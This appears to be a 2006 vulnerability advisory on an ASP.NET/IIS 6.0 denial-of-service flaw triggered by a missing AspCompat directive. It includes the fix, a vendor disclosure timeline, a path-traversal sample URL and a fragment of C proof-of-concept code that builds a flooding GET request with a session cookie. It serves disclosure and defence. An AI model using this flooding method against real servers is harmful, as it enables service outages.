* Windows 2003 (SP1) + IIS 6.0 + .NET Framework 1.1 Windows XP Professional Edition + IIS 6.0 + .NET Framework 1.1
Missing AspCompat directive causes general instability and poor performance of the web application, just a simple increase of load on a web server may cause it to crash.
If simultaneous requests are made to the webserver for atleast 100 - 300 for each URL that references COM components and restricted files (within the application directory path) then the worker process fails or crash at any particular instant.
http://<Domain>/asp-app\default.aspx (sample links with reference to any COM component) http://<Domain>/asp-app\..\aspapplogs/log1.log
ASP-intrinsic objects (like STA COM components) are not enabled in ASP.NET by default, and in ASP.NET, the thread pool is a multithreaded apartment (MTA) by default. So, to use the COM components effectively these defaults should be explicitly changed by using the following attribute in the @Page directive:
<%@Page ASPCompat="true" %>
This directive causes ASP.NET to provide access to ASP-intrinsic objects and changes the thread pool to STA. It is observed that after addition of this directive, the issue gets resolved.
1/10/2006 - Bug reported to the vendor
1/11/2006 - MSRC acknowledged and assigned a case number 6367
1/12/2006 - Vendor requested for additional info
1/12/2006 - Vendor provided with additional info
1/24/2006 - Vendor requested for stack dump
1/27/2006 - Stack dump was provided to vendor
2/02/2006 - Vendor requested for a re-test with the a temporary fix applied
2/10/2006 - Issue re-tested with the fix applied and the test failed
2/18/2006 - Vendor confirmed the issue and suggested the fix.
2/23/2006 - Vendor requested to get the security advisory passed via the MSRC before releasing.
3/14/2006 - Vendor provided with the draft version of the advisory
3/16/2006 - Vendor reviewed the advisory and suggested minor changes
3/21/2006 - Vendor provided with the updated advisory with the necessary changes made
3/21/2006 - Vendor granted permission to release the advisory
3/21/2006 - Public Disclosure
/* Prepare the GET request for the desired link */
strcat(szGetReqH, " HTTP/1.1\r\n");
strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
strcat(szGetReqH, "Accept-Language: en-us\r\n");
strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");
strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");
strcat(szGetReqH, "Host: \r\n" );
strcat(szGetReqH, "Connection: Keep-Alive\r\n" );
/* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */
strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\r\n" );
strcat(szGetReqH, ".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );